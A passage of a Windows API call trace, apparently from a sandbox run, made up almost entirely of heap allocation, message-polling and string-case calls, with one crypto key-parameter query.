(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0191.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0191.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0191.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0191.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0191.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0191.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0191.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0191.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0191.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0191.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0191.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0191.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0191.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0191.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0191.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0191.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0191.505] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0191.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0191.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0191.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0191.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0191.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0191.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0191.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0191.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0191.505] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0191.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0191.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0191.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2888 [0191.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0191.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0191.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0191.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0191.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd528 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0191.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0191.506] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0191.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0191.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0191.506] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0191.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0191.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0191.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0191.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0191.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0191.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0191.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0191.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0191.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0191.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0191.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0191.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0191.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0191.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0191.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0191.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0191.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0191.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0191.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0191.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.508] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0191.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0191.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0191.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0191.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0191.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0191.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0191.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0191.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0191.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0191.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0191.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0191.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0191.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0191.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0191.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0191.509] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0191.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0191.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0191.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0191.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0191.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0191.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0191.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0191.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.509] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0191.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd708 [0191.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0191.509] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0191.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0191.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0191.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0191.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0191.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0191.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0191.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0191.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0191.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0191.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0191.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0191.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0191.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0191.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0191.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0191.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0191.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0191.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0191.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0191.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0191.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0191.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0191.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0191.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0191.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0191.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0191.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0191.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0191.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0191.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0191.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0191.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0191.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0191.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0191.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0191.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0191.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0191.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0191.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0191.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0191.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0191.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0191.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0191.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0191.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0191.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0191.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0191.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0191.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0191.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0191.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0191.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0191.514] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0191.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0191.515] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2738, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2738*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0191.515] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.515] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 